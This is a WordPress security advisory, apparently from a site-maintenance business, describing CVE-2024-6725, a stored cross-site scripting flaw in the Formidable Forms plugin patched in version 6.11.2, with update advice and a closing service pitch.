Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder Vulnerability – Authenticated (Subscriber+) Stored Cross-Site Scripting – CVE-2024-6725 | WordPress Plugin Vulnerability Report
Plugin Name: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder
Key Information:
- Software Type: Plugin
- Software Slug: formidable
- Software Status: Active
- Software Author: strategy11team
- Software Downloads: 21,415,029
- Active Installs: 400,000
- Last Updated: August 6, 2024
- Patched Versions: 6.11.2
- Affected Versions: <= 6.11.1
Vulnerability Details:
- Name: Formidable Forms <= 6.11.1
- Type: Authenticated (Subscriber+) Stored Cross-Site Scripting
- CVE: CVE-2024-6725
- CVSS Score: 4.9
- Publicly Published: July 30, 2024
- Researcher: zer0gh0st
- Description: The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘html’ parameter in all versions up to, and including, 6.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with form editing permissions and Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Summary:
The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder for WordPress has a vulnerability in versions up to and including 6.11.1 that allows authenticated (Subscriber+) stored cross-site scripting. This vulnerability has been patched in version 6.11.2.
Detailed Overview:
The Formidable Forms plugin, widely used for creating contact forms, surveys, quizzes, payment forms, calculators, and custom forms on WordPress sites, was found to have a critical vulnerability. Discovered by the researcher zer0gh0st, this vulnerability is due to insufficient input sanitization and output escaping in the 'html' parameter. The flaw allows authenticated users with at least Subscriber-level access and form editing permissions to inject malicious web scripts into pages. These scripts execute whenever the compromised pages are accessed, potentially leading to unauthorized actions and data breaches.
The vulnerability, identified as CVE-2024-6725, has a CVSS score of 4.9, indicating a medium severity level. It was publicly disclosed on July 30, 2024, and affects all plugin versions up to and including 6.11.1. The developers promptly addressed the issue, releasing a patched version, 6.11.2, on August 6, 2024.
Advice for Users:
- Immediate Action: Users are strongly encouraged to update to version 6.11.2 immediately to mitigate the risk of exploitation.
- Check for Signs of Vulnerability: Users should inspect their sites for any unusual activities or scripts that might indicate a compromise.
- Alternate Plugins: While a patch is available, users might still consider exploring alternative plugins that offer similar functionality as an extra precaution.
- Stay Updated: Regularly updating all plugins to their latest versions is crucial to prevent vulnerabilities.
Conclusion:
The swift response from the Formidable Forms development team to patch this vulnerability underscores the importance of timely updates. Users are advised to ensure that they are running version 6.11.2 or later to secure their WordPress installations.
References:
Detailed Report:
Keeping your website secure is an ongoing challenge that requires vigilance and regular maintenance. One of the most effective ways to protect your site from potential threats is to ensure all your plugins and software are up to date. Recently, a critical vulnerability was discovered in the Formidable Forms plugin, a widely used tool for creating contact forms, surveys, quizzes, payment forms, calculators, and custom forms on WordPress sites. This vulnerability, known as CVE-2024-6725, exposes your site to the risk of cross-site scripting attacks, potentially allowing unauthorized users to inject malicious scripts into your web pages.
Risks and Potential Impacts
The vulnerability allows authenticated users with at least Subscriber-level access and form editing permissions to inject malicious web scripts into pages. These scripts execute whenever the compromised pages are accessed, potentially leading to unauthorized actions and data breaches. This can result in significant security risks, including:
- Unauthorized access to sensitive data
- Defacement of web pages
- Redirection to malicious websites
- Loss of user trust and damage to your business's reputation
Overview of Previous Vulnerabilities
Since January 26, 2016, there have been 18 previous vulnerabilities reported in the Formidable Forms plugin. This history highlights the importance of staying vigilant and ensuring that your plugins are consistently updated to the latest secure versions.
Conclusion
The swift response from the Formidable Forms development team to patch this vulnerability underscores the importance of timely updates. Users are advised to ensure that they are running version 6.11.2 or later to secure their WordPress installations. For small business owners, maintaining website security might seem overwhelming, but staying informed and proactive is key. Consider leveraging professional services to manage your website’s security, allowing you to focus on your core business activities. Regular maintenance, including updates and vulnerability checks, is essential in safeguarding your site against potential threats.
Staying Secure
Staying on top of WordPress security can feel overwhelming for small business owners without dedicated IT staff. At Your WP Guy, we exist to shoulder that burden for you. Our WordPress experts can fully audit, secure, maintain and support your site - so you can focus on growing your business with peace of mind.
Don't tackle security risks alone. Let us help you assess any impact from this vulnerability, update your plugins, and implement ongoing maintenance to avoid future threats. We treat your website like it's our own - because we know how critical it is for reaching your customers.
Get in touch for a free consultation today on making WordPress security stress-free. Call 678-995-5169 or book a call here. Our knowledgeable team is ready to help you safeguard your online presence.